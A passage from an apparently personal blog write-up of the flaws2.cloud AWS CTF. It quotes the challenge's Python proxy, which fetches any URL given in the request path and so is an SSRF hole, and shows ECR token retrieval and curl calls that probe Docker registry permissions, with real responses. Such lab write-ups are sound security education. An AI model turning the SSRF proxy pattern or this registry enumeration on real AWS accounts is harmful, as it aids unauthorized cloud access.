  <span style="color: #66d9ef">def</span> <span style="color: #a6e22e">do_GET</span><span style="color: #f8f8f2">(self):</span>
    <span style="color: #f8f8f2">self</span><span style="color: #f92672">.</span><span style="color: #f8f8f2">send_response(</span><span style="color: #ae81ff">200</span><span style="color: #f8f8f2">)</span>
    <span style="color: #f8f8f2">self</span><span style="color: #f92672">.</span><span style="color: #f8f8f2">send_header(</span><span style="color: #e6db74">&quot;Content-type&quot;</span><span style="color: #f8f8f2">,</span> <span style="color: #e6db74">&quot;text/html&quot;</span><span style="color: #f8f8f2">)</span>
    <span style="color: #f8f8f2">self</span><span style="color: #f92672">.</span><span style="color: #f8f8f2">end_headers()</span>

    <span style="color: #75715e"># Remove starting slash</span>
    <span style="color: #f8f8f2">self</span><span style="color: #f92672">.</span><span style="color: #f8f8f2">path</span> <span style="color: #f92672">=</span> <span style="color: #f8f8f2">self</span><span style="color: #f92672">.</span><span style="color: #f8f8f2">path[</span><span style="color: #ae81ff">1</span><span style="color: #f8f8f2">:]</span>

    <span style="color: #75715e"># Read the remote site</span>
    <span style="color: #f8f8f2">response</span> <span style="color: #f92672">=</span> <span style="color: #f8f8f2">urllib</span><span style="color: #f92672">.</span><span style="color: #f8f8f2">urlopen(self</span><span style="color: #f92672">.</span><span style="color: #f8f8f2">path)</span>
    <span style="color: #f8f8f2">the_page</span> <span style="color: #f92672">=</span> <span style="color: #f8f8f2">response</span><span style="color: #f92672">.</span><span style="color: #f8f8f2">read(</span><span style="color: #ae81ff">8192</span><span style="color: #f8f8f2">)</span>

    <span style="color: #75715e"># Return it</span>
    <span style="color: #f8f8f2">self</span><span style="color: #f92672">.</span><span style="color: #f8f8f2">wfile</span><span style="color: #f92672">.</span><span style="color: #f8f8f2">write(bytes(the_page))</span>
    <span style="color: #f8f8f2">self</span><span style="color: #f92672">.</span><span style="color: #f8f8f2">wfile</span><span style="color: #f92672">.</span><span style="color: #f8f8f2">close()</span>

<span style="color: #f8f8f2">httpd</span> <span style="color: #f92672">=</span> <span style="color: #f8f8f2">SocketServer</span><span style="color: #f92672">.</span><span style="color: #f8f8f2">ForkingTCPServer((</span><span style="color: #e6db74">&#39;&#39;</span><span style="color: #f8f8f2">,</span> <span style="color: #f8f8f2">PORT),</span> <span style="color: #f8f8f2">Proxy)</span>
<span style="color: #66d9ef">print</span> <span style="color: #e6db74">&quot;serving at port&quot;</span><span style="color: #f8f8f2">,</span> <span style="color: #f8f8f2">PORT</span>
<span style="color: #f8f8f2">httpd</span><span style="color: #f92672">.</span><span style="color: #f8f8f2">serve_forever()</span>
</code></pre></div>

<p>There is a file &ldquo;var/www/html/index.htm&rdquo; with the link inside:</p>
<div class="highlight" style="background: #272822"><pre style="line-height: 125%"><code class="language-html" data-lang="html"><span></span><span style="color: #75715e">&lt;!DOCTYPE html&gt;</span>
<span style="color: #f8f8f2">&lt;</span><span style="color: #f92672">html</span> <span style="color: #a6e22e">lang</span><span style="color: #f92672">=</span><span style="color: #e6db74">&quot;en&quot;</span><span style="color: #f8f8f2">&gt;</span>
...
<span style="color: #f8f8f2">&lt;</span><span style="color: #f92672">body</span><span style="color: #f8f8f2">&gt;</span>
...
<span style="color: #f8f8f2">&lt;</span><span style="color: #f92672">div</span> <span style="color: #a6e22e">class</span><span style="color: #f92672">=</span><span style="color: #e6db74">&quot;content&quot;</span><span style="color: #f8f8f2">&gt;</span>
    <span style="color: #f8f8f2">&lt;</span><span style="color: #f92672">div</span> <span style="color: #a6e22e">class</span><span style="color: #f92672">=</span><span style="color: #e6db74">&quot;row&quot;</span><span style="color: #f8f8f2">&gt;</span>
        <span style="color: #f8f8f2">&lt;</span><span style="color: #f92672">div</span> <span style="color: #a6e22e">class</span><span style="color: #f92672">=</span><span style="color: #e6db74">&quot;col-sm-12&quot;</span><span style="color: #f8f8f2">&gt;</span>
            <span style="color: #f8f8f2">&lt;</span><span style="color: #f92672">center</span><span style="color: #f8f8f2">&gt;&lt;</span><span style="color: #f92672">h1</span><span style="color: #f8f8f2">&gt;</span>Level 3<span style="color: #f8f8f2">&lt;/</span><span style="color: #f92672">h1</span><span style="color: #f8f8f2">&gt;&lt;/</span><span style="color: #f92672">center</span><span style="color: #f8f8f2">&gt;</span>
            <span style="color: #f8f8f2">&lt;</span><span style="color: #f92672">hr</span><span style="color: #f8f8f2">&gt;</span>
            Read about Level 3 at <span style="color: #f8f8f2">&lt;</span><span style="color: #f92672">a</span> <span style="color: #a6e22e">href</span><span style="color: #f92672">=</span><span style="color: #e6db74">&quot;http://level3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud&quot;</span><span style="color: #f8f8f2">&gt;</span>level3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud<span style="color: #f8f8f2">&lt;/</span><span style="color: #f92672">a</span><span style="color: #f8f8f2">&gt;</span>
            <span style="color: #f8f8f2">&lt;</span><span style="color: #f92672">p</span><span style="color: #f8f8f2">&gt;</span>

        <span style="color: #f8f8f2">&lt;/</span><span style="color: #f92672">div</span><span style="color: #f8f8f2">&gt;</span>
    <span style="color: #f8f8f2">&lt;/</span><span style="color: #f92672">div</span><span style="color: #f8f8f2">&gt;</span>
<span style="color: #f8f8f2">&lt;/</span><span style="color: #f92672">div</span><span style="color: #f8f8f2">&gt;</span>
<span style="color: #f8f8f2">&lt;/</span><span style="color: #f92672">body</span><span style="color: #f8f8f2">&gt;</span>
<span style="color: #f8f8f2">&lt;/</span><span style="color: #f92672">html</span><span style="color: #f8f8f2">&gt;</span>
</code></pre></div>

<h3 id="bonus-registry-via-http-api">Bonus - Registry via HTTP API</h3>

<p>We have not been able to list repositories via the AWS API.
Will the Registry API we just logged into allow us to do it?
Get a token and try:</p>

<pre><code> # export TOKEN=$(aws ecr get-authorization-token --registry-id 653711331788 --output text --query 'authorizationData[].authorizationToken')
 # echo $TOKEN
QVdTO...USjk=
 # curl -i -H &quot;Authorization: Basic $TOKEN&quot; https://653711331788.dkr.ecr.us-east-1.amazonaws.com/v2/
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Date: Thu, 21 Nov 2019 16:37:11 GMT
Docker-Distribution-Api-Version: registry/2.0
Content-Length: 0
Connection: keep-alive
</code></pre>

<p>This confirms AWS uses a v2 Docker registry.
Technically this should now support a call to list all repositories (see
<a href="https://docs.docker.com/registry/spec/api/#listing-repositories">Docker documentation</a>).
However, AWS properly integrated IAM security. We cannot just list the
repositories through registry calls:</p>

<pre><code> # curl -i -H &quot;Authorization: Basic $TOKEN&quot; https://653711331788.dkr.ecr.us-east-1.amazonaws.com/v2/_catalog
HTTP/1.1 403 Forbidden
Content-Type: application/json; charset=utf-8
Date: Thu, 21 Nov 2019 16:39:12 GMT
Docker-Distribution-Api-Version: registry/2.0
Content-Length: 206
Connection: keep-alive

{&quot;errors&quot;:[{&quot;code&quot;:&quot;DENIED&quot;,&quot;message&quot;:&quot;User: arn:aws:iam::692779772500:user/delete-me is not authorized to perform: ecr:DescribeRepositories on resource: arn:
aws:ecr:us-east-1:653711331788:repository/*&quot;}]}
</code></pre>

<p>Listing tags the image &ldquo;level2&rdquo; is perfectly possible though, in accordance with our IAM
permissions:</p>

<pre><code> # curl -i -H &quot;Authorization: Basic $TOKEN&quot; https://653711331788.dkr.ecr.us-east-1.amazonaws.com/v2/level2/tags/list
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Date: Thu, 21 Nov 2019 16:42:38 GMT
Docker-Distribution-Api-Version: registry/2.0
Content-Length: 35
Connection: keep-alive

{&quot;name&quot;:&quot;level2&quot;,&quot;tags&quot;:[&quot;latest&quot;]}
</code></pre>

    </div>
    
    <footer>
      <hr>
      <p>
  Published
  
    
      by <span itemprop="author">Dominic Breuker</span>
    
  
  <time itemprop="datePublished" datetime="0001-01-01T00:00:00&#43;00:00">
    1 Jan, 0001
  </time>
  
  
  using <span itemprop="wordCount">1273</span> words.
</p>

      



    </footer>
  </article>
</main>
    <footer>
  

</footer>
  </body>
</html>
